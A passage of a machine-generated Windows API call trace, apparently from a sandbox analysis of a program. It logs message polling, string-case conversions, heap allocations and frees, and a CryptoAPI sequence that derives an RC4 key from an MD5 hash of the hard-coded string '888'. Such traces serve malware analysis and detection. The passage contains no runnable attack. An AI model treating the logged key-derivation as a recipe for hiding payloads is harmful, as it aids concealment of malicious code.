hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.920] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.920] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.920] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.920] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.921] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.921] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.921] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.921] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.921] CryptCreateHash (in: hProv=0xa7be68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.921] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.921] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.922] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.922] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab3f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.922] CryptHashData (hHash=0x9e1c38, pbData=0x2a71c68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.922] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.922] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.922] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.922] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.922] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.922] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.923] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.923] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab2c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.923] CryptDeriveKey (in: hProv=0xa7be68, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0210.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0210.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0210.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0210.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.925] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.925] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0210.926] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.926] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.926] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0210.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0210.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f7100 [0210.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.926] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0210.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0210.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75160 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: 